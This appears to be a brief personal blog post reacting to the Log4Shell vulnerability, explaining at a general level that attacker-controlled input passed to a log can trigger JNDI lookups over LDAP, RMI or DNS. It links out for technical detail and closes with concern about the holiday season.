![]() ![]() This applies to both server-side and client-side applications since the main requirements for the vulnerability are any attacker-controlled input field and this input being passed to the log. To orchestrate this attack, an attacker can use several different JNDI lookups. The most popular lookup currently being seen in both PoCs and active exploitation is utilizing LDAP however, other lookups such as RMI and DNS are also viable attack vectors. Lots of technical info at this site on how to the exploit works, how to detect the vulnerability and how to patch systems temporarily and permanently. Log4shell - using the vulnerability to patch the vulnerability - very clever - /r/netsec DecemGLOBALPROTECT TELKOM HOW TO This will be a Christmas nightmare for many companies, their IT departments and their clients. Let’s hope IT security professional and U.S government agencies can stop this exploit from crippling this holiday season.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |